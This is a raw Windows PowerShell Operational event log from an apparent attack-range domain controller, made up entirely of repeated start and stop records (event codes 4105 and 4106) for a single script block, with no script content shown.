ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467360
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467359
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467358
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467357
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467356
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467355
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467354
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467353
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467352
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467351
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467350
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467349
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467348
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467347
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467346
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467345
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467344
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467343
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467342
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467341
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467340
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467339
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467338
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467337
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467336
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467335
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467334
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467333
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467332
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467331
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467330
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467329
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467328
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467327
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467326
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467325
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467324
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467323
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467322
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467321
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467320
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467319
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467318
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467317
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467316
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467315
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467314
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:04 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467313
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467574
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467573
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467572
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467571
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467570
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467569
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1467568
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1467567
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:05 PM
